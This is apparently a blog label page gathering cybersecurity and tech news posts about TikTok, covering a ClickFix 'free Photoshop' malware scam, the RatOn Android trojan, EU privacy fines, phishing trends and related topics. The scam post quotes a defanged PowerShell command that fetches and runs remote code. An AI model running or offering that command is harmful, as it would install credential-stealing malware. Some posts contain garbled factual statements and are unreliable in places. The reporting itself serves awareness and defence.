Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label TikTok. Show all posts
User Security
malware Photoshop Scam Social Engineering TikTok User Security

TikTok 'Free Photoshop' Scam Steals User Data via Malicious Commands

 

A sophisticated scam targeting TikTok users is exploiting the platform's reach to steal personal data by promising free access to expensive software like Adobe Photoshop. Cybercriminals are using a social engineering technique called ClickFix to trick victims into executing malicious commands that install information-stealing malware on their systems.

The scam operates through TikTok videos that demonstrate seemingly simple technical tricks to activate premium software, including Adobe Photoshop, Microsoft Windows, Discord Nitro, and other popular applications. These videos instruct users to run specific PowerShell commands on their Windows devices, with instructions that appear to be legitimate software activation methods. One example command involves executing iex (irm slmgr[.]win/photoshop), which fetches and runs malicious code from remote servers.

ClickFix attacks differ significantly from traditional phishing campaigns by guiding users through the process of infecting their own devices rather than simply tricking them into clicking malicious links. This social engineering approach exploits users' familiarity with solving minor technical issues, CAPTCHA checks, and human verification processes, making the scam appear more legitimate. Microsoft research indicates that since 2024, ClickFix has been used in nearly half of all recorded cyberattacks, surpassing phishing in popularity among cybercriminals.

When users execute the provided commands, they unknowingly download and install AuroStealer, a Trojan malware specifically designed to harvest sensitive information. This infostealer collects passwords, browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials from infected systems. The malware establishes persistence through scheduled tasks and uses self-compiling techniques to inject shellcode directly into memory, evading detection by security tools.

TikTok's short-form content delivery system and reputation for hosting legitimate technical how-to content makes it an ideal platform for this type of scam. The platform's viral nature enables these malicious videos to accumulate hundreds of likes and reach thousands of viewers before detection, with cybersecurity researcher Xavier Mertens identifying the ongoing campaign. The campaigns have been active since at least May 2025, with marked increases in activity observed through October 2025.

Security experts strongly advise users never to run commands on their machines from TikTok or other social media networks. Because these commands are executed locally on user systems, many security tools and browsers cannot easily detect them, making prevention through user education critical. Organizations should implement PowerShell execution restrictions, monitor scheduled tasks, and block known malicious domains to protect against these threats.
Read more »
Trojan
Android cryptocurrency malware MFA NFC Ransomware RatON TikTok Trojan

RatOn Android Trojan Expands Into Full Remote Access Threat Targeting Banks and Crypto

 



A new Android malware strain called RatOn has rapidly evolved from a tool limited to NFC relay attacks into a sophisticated remote access trojan with the ability to steal banking credentials, hijack cryptocurrency wallets, and even lock users out of their phones with ransom-style screens. Researchers warn the malware is under active development and combines multiple attack methods rarely seen together in one mobile threat.

How It Spreads

RatOn is being distributed through fake websites designed to look like the Google Play Store. Some of these pages advertise an adult-themed version of TikTok called “TikTok 18+.” Once victims install the dropper app, it requests permission to install software from unknown sources, bypassing Android’s built-in safeguards. The second-stage payload then seeks administrator and accessibility permissions, along with access to contacts and system settings, giving it deep control of the device. From there, RatOn can download an additional component called NFSkate, a modified version of the NFCGate tool, enabling advanced relay attacks known as “ghost taps.”


Capabilities and Tactics

The trojan’s abilities are wide-ranging:

1. Overlays and ransomware screens: RatOn can display fake login pages to steal credentials or lock the device with alarming ransom notes. Some overlays falsely accuse users of viewing child exploitation content and demand $200 in cryptocurrency within two hours to regain access.

2. Banking and crypto theft: It specifically targets cryptocurrency wallets such as MetaMask, Trust Wallet, Blockchain.com, and Phantom. By capturing PIN codes and recovery phrases, the malware enables attackers to take over accounts and steal assets. It can also perform automated transfers inside George ÄŒesko, a Czech banking app, by simulating taps and inputs.

3. NFC relay attacks: Through NFSkate, RatOn can remotely use victims’ card data for contactless payments.

4. Remote commands: The malware can change device settings, send fake push notifications, send SMS messages, add contacts, record screens, launch apps like WhatsApp and Facebook, lock the phone, and update its target list of financial apps.

Researchers noted RatOn shares no code with other Android banking trojans and appears to have been built from scratch. A similar trend has been seen before: the HOOK trojan, another Android threat, also experimented with ransomware-style overlays.


Development and Targets

The first sample of RatOn was detected on July 5, 2025, with further versions appearing as recently as August 29, pointing to ongoing development. Current attacks focus mainly on users in the Czech Republic and Slovakia. Investigators believe the need for local bank account numbers in automated transfers suggests possible collaboration with regional money mules.


Why It Matters

RatOn’s integration of overlay fraud, ransomware intimidation, NFC relay, and automated transfers makes it unusually powerful. By combining old tactics with new automation, it raises the risk of large-scale theft from both traditional banking users and cryptocurrency holders.

Users can reduce exposure by downloading apps only from official stores, refusing risky permissions for unknown apps, keeping devices updated, and using strong multi-factor authentication on financial accounts. For cryptocurrency, hardware wallets that keep recovery phrases offline provide stronger protection. Anyone who suspects infection should immediately alert their bank and seek professional removal help.


Read more »
TikTok
China Data Regulation Europe GDPR Privacy Social Media TikTok

EU Fines TikTok $600 Million for Data Transfers to China

EU Fines TikTok $600 Million for Data Transfers to China

Regulators said that the EU has fined TikTok 530 million euros (around $600 million). Chinese tech giant ByteDance owns TikTok, which has been found guilty of illegally sending the private data of EU users to China and lack of compliance to ensure the protection of data from potential access by Chinese authorities. According to an AFP news report, the penalty— one of the largest ever issued to date by EU’s data protection agencies— comes after a detailed inquiry into the legitimacy of TikTok’s data transfer rules. 

TikTok Fine and EU

TikTok’s lead regulator in Europe, Ireland’s Data Protection Commission (DPC) said that TikTok accepted during the probe about hosting European user data in China. DPC’s deputy commissioner Graham Doyle said that “TikTok failed to verify, guarantee, and demonstrate that the personal data of (European) users, remotely accessed by staff in China, was afforded a level of protection essentially equivalent to that guaranteed within the EU,”

Besides this, Doyle said that TikTok’s failure to address the dangers of possible access to Europeans’s private data by Chinese authorities under China’s anti-terrorism, counter-espionage, and other regulations, which TikTok itself found different than EU’s data protection standards. 

TikTok will contest the decision

TikTok has declared to contest the heavy EU fine, despite the findings. TikTok Europe’s Christine Grahn stressed that the company has “never received a request” from authorities in China for European users’ data and that “TikTok” has never given EU users’ data to Chinese authorities. “We disagree with this decision and intend to appeal it in full,” Christine said. 

TikTok boasts a massive 1.5 billion users worldwide. In recent years, the social media platform has been under tough pressure from Western governments due to worries about the misuse of data by Chinese actors for surveillance and propaganda aims. 

TikTok to comply with EU Rules

In 2023, the Ireland DPC fined TikTok 354 million euros for violating EU rules related to the processing of children’s information. The DPC’s recent judgment also revealed that TikTok violated requirements under the EU’s General Data Protection Regulation (GDPR) by sending user data to China. The decision includes a 530 million euro administrative penalty plus a mandate that TikTok aligns its data processing rules with EU practices within 6 months. 

Read more »
web3 technology
Blockchain Technology decentralized apps Technology TikTok web3 technology

How Trust Can Drive Web3 Adoption and Growth

 




Web3 technology promises to transform the internet, making it decentralized, secure, and transparent. However, many people hesitate to adopt it due to a lack of trust in the technology. Building this trust requires clear explanations, user-friendly experiences, and a solid infrastructure.  


Social Media: A Gateway to Web3  

Platforms like TikTok have become key tools for introducing users to Web3. For example, Hamster Kombat, a cryptocurrency-based game, attracted over 300 million players using TikTok. The platform made it easy for users to learn about the game by sharing tutorials, guides, and strategies, building trust among new players.  

Similarly, SonicX, a popular tap-to-earn game, onboarded over two million users through TikTok. The team behind the game, Sonic SVM, simplified the process for users by creating automatic wallets and removing transaction fees, making it feel like a traditional app. These efforts demonstrate how social media can act as a bridge between Web2 and Web3, helping more people understand and use these technologies.  


Why Strong Infrastructure Matters  

While social media helps with onboarding, a dependable Web3 infrastructure is essential for long-term success. Powerloom, for example, offers a decentralized network of over 5,300 nodes that collect and update blockchain data in real time. This ensures that decentralized applications (dApps) and smart contracts always operate with accurate information. By eliminating outdated data risks, Powerloom strengthens user confidence in Web3 platforms.  


Blockchain and dApps: Trust-Building Tools  

At its core, blockchain technology ensures security and transparency. It uses decentralized networks and cryptography to prevent tampering with data. This builds trust, as users can rely on the integrity of the system.  

Decentralized applications (dApps) also play a vital role. Take Uniswap, for instance. Its open-source code is accessible to anyone for verification, and regular security audits ensure its reliability. Users can trade or add liquidity without needing approval, reinforcing the trustworthiness of the platform.  


Reputation Through Tokenization  

Tokenization brings another layer of trust by rewarding users with reputation tokens for positive actions. These tokens serve as a record of reliability and contributions, discouraging malicious activity. In decentralized marketplaces, they enable peer-to-peer reviews without depending on centralized authorities, making the system fairer and more transparent.  

Web3 technology has immense potential, but its adoption depends on trust. Social media, combined with secure infrastructure, transparent dApps, and reputation systems, can make this next phase of the internet more accessible and trustworthy. By focusing on these elements, Web3 can achieve its vision of a decentralized and user-driven digital world.  


Read more »
Trojan
Cyber Security Google AMP Phishing Attacks RATs Russia TikTok Trojan

Hackers Use Russian Domains for Phishing Attacks

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activities and a change in attack tactics. If you are someone who communicates via email regularly, keep a lookout for malicious or unusual activities, it might be a scam. The blog covers the latest attack tactics threat actors are using.

Malicious email escapes SEGs

Daily, at least one suspicious email escapes Secure Email Getaways (SEGs), like Powerpoint and Microsoft, every 45 seconds, showing a significant rise from last year’s attack rate of one of every 57 seconds, according to the insights from Cofense Intelligence’s third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.

The use of malicious Office documents, particularly those in.docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of.ru and.su top-level domains (TLDs). Domains with the.ru (Russia) and.su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating cybercriminals are turning to less common and geographically associated domains to evade detection and make it more difficult for victims and security teams to track data theft activities.

Read more »
Zero Click Attacks
Cyber Attacks Personal Data Social Media TikTok Zero Click Attacks

Stay Secure: How to Prevent Zero-Click Attacks on Social Platforms

Stay Secure: How to Prevent Zero-Click Attacks on Social Platforms

While we have all learned to avoid clicking on suspicious links and be wary of scammers, this week we were reminded that there are some silent threats out there that we should be aware of zero-click assaults.

Recent Incidents

As Forbes first reported, TikTok revealed that a few celebrities' accounts, including CNN and Paris Hilton, were penetrated by simply sending a direct message (DM). Attackers apparently used a zero-day vulnerability in the messaging component to run malicious malware when the message was opened. 

The NSA advised all smartphone users to turn their devices off and back on once a week for safety against zero-click assaults, however, the NSA accepts that this tactic will only occasionally prevent these attacks from succeeding. However, there are still steps you can take to protect yourself—and security software such as the finest VPNs can assist you.

TikTok’s Vulnerability: A Case Study in Zero-Click Exploits

As the name implies, a zero-click attack or exploit requires no activity from the victim. Malicious software can be installed on the targeted device without the user clicking on any links or downloading any harmful files.

This feature makes these types of attacks extremely difficult to detect. This is simply because a lack of engagement significantly minimizes the likelihood of hostile activity.

Cybercriminals use unpatched vulnerabilities in software code to carry out zero-click exploits, known as zero-day vulnerabilities. According to experts at security firm Kaspersky, apps with messaging or voice calling functions is a frequent target because "they are designed to receive and interpret data from untrusted sources"—making them more vulnerable.

Once a device vulnerability has been properly exploited, hackers can use malware, such as info stealers, to scrape your private data. Worse, they can install spyware in the background, recording all of your activity.

The Silent Threat

This is exactly how the Pegasus spyware attacked so many victims—more than 1,000 people in 50 countries, according to the 2021 joint investigation—without them even knowing it.

The same year, Citizen Lab security experts revealed that utilizing two zero-click iMessage bugs, nine Bahraini activists' iPhones were successfully infiltrated with Pegasus spyware. In 2019, attackers used a WhatsApp zero-day vulnerability to inject malware into communications via a missed call.

As the celebrity TikTok hack story shows, social media platforms are becoming the next popular target. Meta, for example, recently patched a similar vulnerability that could have let attackers to take over any Facebook account.

Protective Measures

Stay Updated
  • Regularly update your operating system, apps, and firmware. Patches often address known vulnerabilities.
  • Enable automatic updates to stay protected without manual intervention.
App Store Caution
  • Download apps only from official app stores (e.g., Google Play, Apple App Store). Third-party sources may harbor malicious apps.
  • Remove unused apps to reduce your attack surface.
Multi-Factor Authentication (MFA)
  • Enable MFA for all your accounts, especially social media platforms. Even if an attacker gains access to your password, MFA adds an extra layer of security.
  • Use authenticator apps or hardware tokens instead of SMS-based codes.
Beware of DMs
  • Be cautious when opening DMs, especially from unknown senders.
  • Avoid clicking on links or downloading files unless you’re certain of their legitimacy.
Media Files Scrutiny
  • Treat media files (images, videos, audio) with suspicion.
  • Avoid opening files from untrusted sources, even if they appear harmless.
No Jailbreaking or Rooting
  • Modifying your device’s software (jailbreaking/rooting) weakens security.
  • Stick to the official software to maintain robust defenses.
Read more »
TikTok
IPO Rubrik Startups Technology TikTok

The Tech Landscape: Rubrik, TikTok, and Early-Stage Startups


The idea that the public markets are not as exclusive to tech firms as some believed was reinforced by Rubrik's aggressive IPO pricing and the positive response it received from the public markets following its listing. If Rubrik's outcome is insufficient to end the deadlock, perhaps there is another issue at hand.

1. Rubrik’s IPO Triumph

Rubrik, a data management company, recently made waves by going public through an initial public offering (IPO). The reception was nothing short of remarkable, signaling a shift in sentiment toward tech startups. For years, the public markets seemed somewhat closed to these fledgling companies, but Rubrik’s success challenges that notion.

The IPO process is a litmus test for any company. It involves transparency, financial scrutiny, and investor confidence. Rubrik’s strong pricing and positive market response indicate that investors are willing to embrace tech startups, provided they demonstrate robust fundamentals and growth potential.

As Rubrik’s stock ticker symbol blinks across trading screens, it serves as a beacon for other startups eyeing the public markets. The message is clear: If you have a compelling product, a solid business model, and a vision for the future, the IPO route is viable.

2. TikTok’s Regulatory Quandary

TikTok, the viral short-form video platform, has been on a rollercoaster ride. Loved by millions for its entertaining content, it also faces regulatory hurdles. The United States government has demanded that TikTok divest from its parent company or face a ban. This move underscores the geopolitical complexities surrounding tech companies.

Why the scrutiny? TikTok’s Chinese ownership raises concerns about data privacy, national security, and censorship. As the app continues to captivate users globally, governments grapple with how to balance innovation and security. The TikTok saga serves as a cautionary tale for tech companies operating in a globalized world.

For startups, understanding regulatory landscapes is crucial. Navigating legal frameworks, data protection laws, and geopolitical tensions requires strategic foresight. TikTok’s experience highlights the need for transparency, compliance, and proactive engagement with regulators.

3. TechCrunch Early Stage Event

Tech Crunch hosted its annual Early Stage event. This gathering brought together startups, investors, and industry experts. The event’s focus? Empowering early-stage companies to thrive.

In Boston, where the event took place, entrepreneurs pitched their ideas, networked, and absorbed insights from seasoned veterans. The buzz around early-stage startups was palpable. Investors scouted for promising ventures, and founders honed their pitches.

Why does this matter? Early-stage support is the lifeblood of innovation. Startups need mentorship, capital, and exposure to flourish.

Read more »
Western nations
Cyber Security Cybersecurity Safety concerns threat TikTok Western nations

Tiktok Ban: China Criticizes a Proped Bill in the US Congress

China has criticized a proposed bill in the US Congress that could potentially lead to the banning of TikTok in the United States, labeling it as unfair. This action marks the latest development in a longstanding dispute over safety concerns regarding the popular app, which is owned by a Chinese company. Authorities, politicians, and security personnel in numerous Western nations have already been prohibited from installing TikTok on official devices.

Addressing three major cyber concerns surrounding TikTok, the first revolves around its data collection practices. Critics frequently accuse TikTok of gathering excessive amounts of user data, a claim supported by a cyber-security report published by Internet 2.0, an Australian firm, in July 2022. This report, based on an analysis of TikTok's source code, highlighted what it described as "excessive data harvesting," including details such as location, device specifications, and installed apps. However, contrasting studies suggest that TikTok's data collection practices are not significantly different from other social media platforms, with similar types of data being collected for user behavior tracking.

The second concern focuses on the potential for TikTok to be exploited by the Chinese government for espionage purposes. TikTok asserts its independence and denies providing user data to the Chinese government, emphasizing that such actions would not be entertained if requested. However, critics remain wary due to the app's ownership by ByteDance, a Beijing-based tech company. Allegations raised by former US President Donald Trump in a 2020 executive order suggested that TikTok's data collection could enable China to engage in espionage activities, although concrete evidence supporting these claims remains elusive.

The third concern revolves around the possibility of TikTok being utilized as a tool for "brainwashing" users. TikTok defends its community guidelines, stating that they prohibit misinformation and harmful content. However, concerns have been raised regarding the platform's recommendation algorithm and its potential susceptibility to influence operations. Comparisons with Douyin, TikTok's sister app available only in China, highlight disparities in content censorship. While Douyin reportedly promotes wholesome and educational content, TikTok's approach appears less stringent in terms of political censorship.

Overall, these concerns primarily exist as theoretical risks rather than concrete evidence of wrongdoing. Critics argue that TikTok could potentially serve as a covert instrument during times of conflict, akin to a "Trojan horse." However, decisions to ban TikTok, as seen in India in 2020, or restrict Chinese tech companies like Huawei from participating in 5G infrastructure development, are often based on these theoretical risks rather than tangible evidence. Conversely, China does not face similar concerns regarding US-based apps, as access to such platforms has been blocked for Chinese citizens for several years.
Read more »
WhatsApp
Apple Cyber Crime Cyberattacks CyberCrime DMA Compliant E2EE iMessage Messenger Meta Privacy Protocol Technology Fusion TikTok WhatsApp

Signal Protocol Links WhatsApp, Messenger in DMA-Compliant Fusion

 


As part of the launch of the new EU regulations governing the use of digital "gatekeepers," Meta is ready to answer all of your questions about WhatsApp and Messenger providing end-to-end encryption (E2EE), while also complying with the requirements outlined in the Digital Markets Act (DMA). A blog post by Meta on Wednesday detailed how it plans to enable interoperability with Facebook Messenger and WhatsApp in the EU, which means users can message each other if they also use Signal's underlying encryption protocol when communicating with third-party messaging platforms. 

As the Digital Markets Act of Europe becomes more and more enforced, big tech companies are getting ready to comply with it. In response to the new competition rules that took effect on March 6, Google, Meta, and other companies have begun making plans to comply and what will happen to end users. 

There is no doubt that the change was not entirely the result of WhatsApp's decision. It is known that European lawmakers have designated WhatsApp parent company Meta as one of the six influential "gatekeeper" companies under their sweeping Digital Markets Act, giving it six months to allow others to enter its walled garden. 

Even though it's just a few weeks until the deadline for WhatsApp interoperability with other apps approaches, the company is describing its plans. As part of the first year of the regulation, the requirements were designed to support one-to-one chats and file sharing like images, videos, or voice messages, with plans for these requirements to be expanded in the coming years to include group chats and calls as well. 

In December, Meta decided to stop allowing Instagram to communicate with Messenger, presumably to implement a DMA strategy. In addition to Apple's iMessage app and Microsoft's Edge web browser, the EU has also made clear that the four parent companies of Facebook, Google, and TikTok are "gatekeepers," although Apple's parent company Alphabet and TikTok's parent company ByteDance are excluded. 

ETA stated that before the company can work with third-party providers to implement the service, they need to sign an agreement for interoperability between Messenger and WhatsApp. To ensure that other providers use the same security standards as WhatsApp, the company requires them to use the Signal protocol. 

However, if they can be found to meet these standards, they will accept others. As soon as another service sends a request for interoperability, Meta is given a window of three months in which to do so. The organization warns, however, that functionality may not be available for the general public to access immediately. 

The approach Meta has taken to interoperability is designed to meet the DMA requirements while also providing a feasible option for third-party providers looking to maximize security and privacy for their customers. For privacy and security, Meta will use the Signal Protocol to ensure end-to-end encrypted communication. This protocol is currently widely considered the gold standard for end-to-end encryption in E2EE.
Read more »
X
Adobe Amazon Artificial Intelligence Cyberattacks CyberCrime Microsoft Technology TikTok X

Corporate Accountability: Tech Titans Address the Menace of Misleading AI in Elections

 


In a report issued on Friday, 20 leading technology companies pledged to take proactive steps to prevent deceptive uses of artificial intelligence from interfering with global elections, including Google, Meta, Microsoft, OpenAI, TikTok, X, Amazon and Adobe. 

According to a press release issued by the 20 companies participating in the event, they are committed to “developing tools to detect and address online distributions of artificial intelligence content that is intended to deceive voters.” 

The companies are also committed to educating voters about the use of artificial intelligence and providing transparency in elections around the world. It was the head of the Munich Security Conference, which announced the accord, that lauded the agreement as a critical step towards improving election integrity, increasing social resilience, and creating trustworthy technology practices that would help advance the advancement of election integrity. 

It is expected that in 2024, over 4 billion people will be eligible to cast ballots in over 40 different countries. A growing number of experts are saying that easy-to-use generative AI tools could potentially be used by bad actors in those campaigns to sway votes and influence those elections. 

From simple text prompts, users can generate images, videos, and audio using tools that use generative artificial intelligence (AI). It can be said that some of these services do not have the necessary security measures in place to prevent users from creating content that suggests politicians or celebrities say things they have never said or do things they have never done. 

In a tech industry "agreement" intended to reduce voter deception regarding candidates, election officials, and the voting process, the technology industry aims at AI-generated images, video, and audio. It is important to note, however, that it does not call for an outright ban on such content in its entirety. 

It should be noted that while the agreement is intended to show unity among platforms with billions of users, it mostly outlines efforts that are already being implemented, such as those designed to identify and label artificial intelligence-generated content already in the pipeline. 

Especially in the upcoming election year, which is going to see millions of people head to the polls in countries all around the world, there is growing concern about how artificial intelligence software could mislead voters and maliciously misrepresent candidates. 

AI appears to have already impersonated President Biden in New Hampshire's January primary attempting to discourage Democrats from voting in the primary as well as purportedly showing a leading candidate claiming to have rigged the election in Slovakia last September by using obvious AI-generated audio. 

The agreement, endorsed by a consortium of 20 corporations, encompasses entities involved in the creation and dissemination of AI-generated content, such as OpenAI, Anthropic, and Adobe, among others. Notably, Eleven Labs, whose voice replication technology is suspected to have been utilized in fabricating the false Biden audio, is among the signatories. 

Social media platforms including Meta, TikTok, and X, formerly known as Twitter, have also joined the accord. Nick Clegg, Meta's President of Global Affairs, emphasized the imperative for collective action within the industry, citing the pervasive threat posed by AI. 

The accord delineates a comprehensive set of principles aimed at combating deceptive election-related content, advocating for transparent disclosure of origins and heightened public awareness. Specifically addressing AI-generated audio, video, and imagery, the accord targets content falsifying the appearance, voice, or conduct of political figures, as well as disseminating misinformation about electoral processes. 

Acknowledged as a pivotal stride in fortifying digital communities against detrimental AI content, the accord underscores a collaborative effort complementing individual corporate initiatives. As per the "Tech Accord to Combat Deceptive Use of AI in 2024 Elections," signatories commit to developing and deploying technologies to mitigate risks associated with deceptive AI election content, including the potential utilization of open-source solutions where applicable.

 Notably, Adobe, Amazon, Arm, Google, IBM, and Microsoft, alongside others, have lent their support to the accord, as confirmed in the latest statement.
Read more »
TikTok
Android Cyberattacks Cybersecurity Gaming Giant Nintndo iOS Microsoft Passwords Privacy TikTok

Gaming Giant Nintendo Embraces Passkeys for Enhanced Security and Convenience

 


As passkeys continue to be more widely used as authenticators for a variety of sign-in purposes, the path towards a passwordless future is being driven forward. There are reports that this authentication method will be part of Microsoft's Windows 11 operating system, which may apply to user accounts on Nintendo's game consoles, Twitter accounts, and the device switching feature of messaging giant WhatsApp, as well as other websites and applications. 

Passkeys are a form of password-less authentication which harnesses the power of fingerprint, face scan, and other biometric techniques to create a stronger foundation for logins while keeping their security. A passkey is now available for consumers to register with the company and use on multiple devices to sign in from anywhere. 

According to the company, all users who have compatible devices can use the biometric login to access their smart devices, especially those who use biometric logins to access their devices. It is possible to use Passkey on iOS and Android operating systems, and all users need to do is meet the minimum requirements in terms of software to accomplish that task.

Adding a passkey to a user's Nintendo account can be done by visiting accounts.nintendo.com from the device that they plan to use the passkey on. Upon logging into their Nintendo Account, go to the Sign-in and Security settings section > Passwords > Edit, and then follow the instructions. 

After that, select Register a new passkey and follow the steps to complete the setup process on the user's device by selecting the Register a new passkey option. For now, Nintendo does not support passkeys on devices with iOS 16 or later, iPadOS 16 or later, macOS 13 or later, and Android 9 or later, as well as devices that are running iOS 16 or later. It will also allow users to register up to 10 different passkeys for their Nintendo account, and it will also assist with logging in. 

The Nintendo support page can give them more information on how to use passkeys and other issues related to passkeys. Passkeys have become a more secure alternative to passwords among an increasing number of online services that support them as a safer substitute. As far as passkeys are concerned, TikTok has joined the likes of Apple, PayPal, and 1Password in fully supporting the technology this year. 

In addition to Google Chrome, Cloud, and Workspace accounts, users can now also sign in directly to their GitHub account. GitHub just announced a passwordless method of logging in today. Passkeys are a tangible example of Nintendo's commitment to the future of authentication using digital means. Such advancements must be made in the gaming, technology, and digital security industries as the lines between them continue to blur. 

The time has come for all the developers and product managers out there to gear up and dive into the world of passkeys to learn more about them. In the future, it is going to be seamless and secure, and it seems like it can't get any better than that. 

Nintendo's Passkey now supports online account logins. A NintendoSoup team member discovered that the company has also been working on integrating Passkeys with Nintendo Accounts as part of a recent security enhancement. With this technology used as an additional layer of authentication, the company may be able to enhance the security of its accounts.  

If the user registers a passkey with their Nintendo Account, there is an additional layer of security that can protect the account from unauthorized access. To sign in to their account, users have the option of using their passkey instead of their email address or the sign-in ID and password they normally use to sign in. 

In Nintendo's opinion, users' passkeys are stored in advance on their smartphones or other devices, so they can access that device when they are signing in, and it can be retrieved by logging onto the device.  Using passkeys to switch devices in the WhatsApp beta It was announced recently that WhatsApp has enabled the use of passkeys in its beta channel to facilitate sign-in for its popular messaging app as part of its ongoing efforts to strengthen security. 

When switching devices, or when setting up the app on a new phone, users can sign in using their face or fingerprint biometrics, or with their screen lock password or pattern while setting up the app on a new phone, according to Android Police.

A new feature has been in the works on the app owned by Meta since August, and today the app outlined that the feature will be available in the next few weeks to more users. There has been a recent addition by WhatsApp to its application that allows you to lock private chats using biometrics. 

There is now the option for users to register their Passkeys to their Nintendo Accounts via supported mobile devices, as long as they meet the following requirements:   iPhone with iOS 16 or newer iPad with iPad 16 or newer Mac computer with macOS 13 or newer Android devices with Android OS 9 or newer
Read more »
TikTok
Cyberattacks data security DPC GDPR Privacy TikTok

TikTok Faces Massive €345 Million Penalty for Mishandling Kids' Data Privacy

 


As a result of TikTok's failure to shield underage users' content from public view as well as violating EU data laws, the company has been fined €345 million (£296 million) for mishandling children's accounts and for breaking the laws. 

Data watchdogs in Ireland, which oversee the Chinese video app TikTok across the EU, recently told legal watchdogs that the video app had violated multiple GDPR rules in its operation. In its investigation, TikTok was found to have violated GDPR by making it mandatory for its users to place their accounts on a public setting by default; failing to give transparent information to child users; allowing a parent to view a child's account using the "family pairing" option to enable direct messaging for those over 16; and not considering the risks to children who were placed on the platform in a public setting and not considering that. 

Children's personal information was not sufficiently protected by the popular Chinese-owned app because it made its account public by default and did not adequately address the risks associated with under-13 users being able to access its platform, according to a decision published by the Irish Data Protection Commission (DPC). 

In a statement released on Tuesday, the Irish Data Protection Commission (DPC) said the company violated eight articles in the GDPR, the EU's primary regulatory authority for the company. There are several legal aspects of data processing which are covered by these laws, and they go from the legal use of personal data to protecting it from unlawful use. 

In most children's accounts, the settings for the profile page are set to public by default, so that everyone will be able to see any content that they post there. In an attempt to allow parents to link to their older child's account and use Direct Messages, this feature called Family Pairing allowed any adult to pair up with their child's account.  

There was no indication the child could be at risk from this feature. In the process of registering users and posting videos, TikTok did not provide the information it should have to child users and instead resorted to what's known as "dark patterns" to encourage users to choose more privacy-invasive options during their registration process. 

According to a DPC decision, the media company has been fined £12.7m after the UK data regulator found TikTok had illegally processed 1.4 million children's data under the age of 13 who were using its platform without their parent's consent in April. 

Despite being a popular social media platform, TikTok has done "very little or nothing, if anything" to ensure the safety of the platform's users from illicit activity. According to TikTok, the investigation examined the privacy setup the company had between 31 July and 31 December 2020, and it has said that it has addressed all of the issues raised as a result of the investigation.

Since 2021, all new and existing TikTok accounts that are 13- to 15-year-olds as well as those that are already set up have been set up as private, meaning that only people the user has authorized will be able to view their content. Additionally, the DPC pointed out that some aspects of their decision had been overruled by the European Data Protection Board (EDPB), a body made up of data protection regulators from various EU member states, on certain aspects. 

The German regulator had to propose a finding that the use of “dark patterns” – the term for deceptive website and app design that leads users to choose certain behaviours or make certain choices – violated the GDPR's provisions for the fair processing of personal data, and this was the reason why it had to include the proposed finding. 

TikTok has been accused of unlawfully making accounts of its users aged 13 to 17 public by default, which effectively means anyone can watch and comment on the videos that individuals have posted on their TikTok accounts between July and December 2020, according to the Irish privacy regulator. 

Moreover, the company failed to adequately assess the risks associated with the possibility of users under the age of 13 gaining access to its platform through marketing channels. Also, the report found that TikTok is still manipulating teenagers who join the platform by requesting them to share their videos and accounts publicly through pop-up advertisements that manipulate them. 

A regulator has ordered the company to change these misleading designs, also known as dark patterns, within three months to prevent any further harm to consumers. As early as the second half of 2020, accounts of minors could be linked to unverified accounts of adults. 

It was also reported that the video platform failed to explain to teenagers previous to the release of their content and accounts to the general public the consequences of making those content and accounts public. It has also been mentioned by the board of European regulators that there were serious doubts in their minds about the effectiveness of TikTok's measures to keep under 13 users off its platform in the latter half of 2020. 

As a result, the EDPB found that TikTok was failing to check the ages of existing users "in a sufficiently systematic manner" even though the mechanisms could be easily circumvented. Because of a lack of information available during the cooperation process, the group was unable to find an infringement, according to the group.

There was a fine of £12.7 million (€14.8 million) from the United Kingdom's data regulator in April for allowing children under 13 to use the platform and use their data. In addition, the company also received a fine of €750,000 from the Dutch privacy authority in 2021 for failing to provide a privacy policy in the Dutch language, which was meant to protect Dutch children.
Read more »
Unauthorized access
ByteDance Chinese Apps Chinese Hackers Data Breach Data Privacy Laws Personal Data TikTok Unauthorized access

China's Access to TikTok User Data Raises Privacy Concerns

A former executive of ByteDance, the parent company of the popular social media platform TikTok, has made shocking claims that China has access to user data from TikTok even in the United States. These allegations have raised concerns about the privacy and security of TikTok users' personal information.

The ex-employees claims come at a time when TikTok is already under scrutiny due to its ties to China and concerns over data privacy. The United States and other countries have expressed concerns that user data collected by TikTok could be accessed and potentially misused by the Chinese government.

According to the former executive, Chinese Communist Party (CCP) officials have direct access to TikTok's backend systems, which allows them to obtain user data from anywhere in the world, including the US. This access allegedly enables the Chinese government to monitor and potentially exploit user data for various purposes.

These claims have significant implications for the millions of TikTok users worldwide. It raises questions about how their personal information is secure and protected from unauthorized access or potential misuse. Furthermore, it adds to the ongoing debate surrounding the relationship between Chinese tech companies and the Chinese government, and the potential risks associated with data sharing and surveillance.

ByteDance has previously denied allegations that TikTok shares user data with the Chinese government. The company has implemented measures to address privacy concerns, such as establishing data centers outside of China and hiring independent auditors to assess its data security practices.

However, these latest claims by a former executive fuel the skepticism and reinforce the need for transparency and independent verification of TikTok's data handling practices. It also underscores the importance of robust data protection regulations and international cooperation in addressing the challenges posed by global technology platforms.

Regulators and policymakers in various countries have examined TikTok's data privacy practices and explored potential restrictions or bans. These claims may add further impetus to those efforts, potentially leading to stricter regulations and increased scrutiny of TikTok's operations.

The allegations made by the ex-ByteDance executive regarding China's access to TikTok user data in the US have sparked fresh concerns about data privacy and security. As the popularity of TikTok continues to grow, it is crucial for the company to address these claims transparently and take additional steps to reassure users that their data is protected. Meanwhile, governments and regulatory bodies must continue to evaluate and enforce robust privacy regulations to safeguard user information in the era of global technology platforms.
Read more »
